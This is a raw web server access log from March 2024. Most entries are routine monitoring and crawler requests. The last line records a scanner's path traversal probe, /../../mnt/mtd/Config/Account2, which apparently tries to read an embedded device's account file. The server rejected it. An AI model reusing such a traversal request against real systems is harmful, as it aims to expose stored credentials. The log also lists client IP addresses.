146.19.24.28 - - [05/Mar/2024:06:57:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [05/Mar/2024:06:57:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/Mar/2024:07:00:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [05/Mar/2024:07:00:31 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/Mar/2024:07:01:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
146.19.24.28 - - [05/Mar/2024:07:02:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/Mar/2024:07:02:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2024:07:03:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/Mar/2024:07:04:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [05/Mar/2024:07:04:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.191.126.213 - - [05/Mar/2024:07:04:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
81.209.177.16 - - [05/Mar/2024:07:04:57 +0100] "GET /robots.txt HTTP/1.1" 404 327 "-" "netEstate NE Crawler (+http://www.website-datenbank.de/)"
81.209.177.16 - - [05/Mar/2024:07:04:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "netEstate NE Crawler (+http://www.website-datenbank.de/)"
138.201.30.176 - - [05/Mar/2024:07:05:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "netEstate NE Crawler (+http://www.website-datenbank.de/)"
212.91.246.72 - - [05/Mar/2024:07:05:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.191.126.213 - - [05/Mar/2024:07:05:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
141.98.11.96 - - [05/Mar/2024:07:05:58 +0100] "GET /../../mnt/mtd/Config/Account2 HTTP/1.1" 400 333 "-" "Mozilla/5.0 zgrab/0.x"
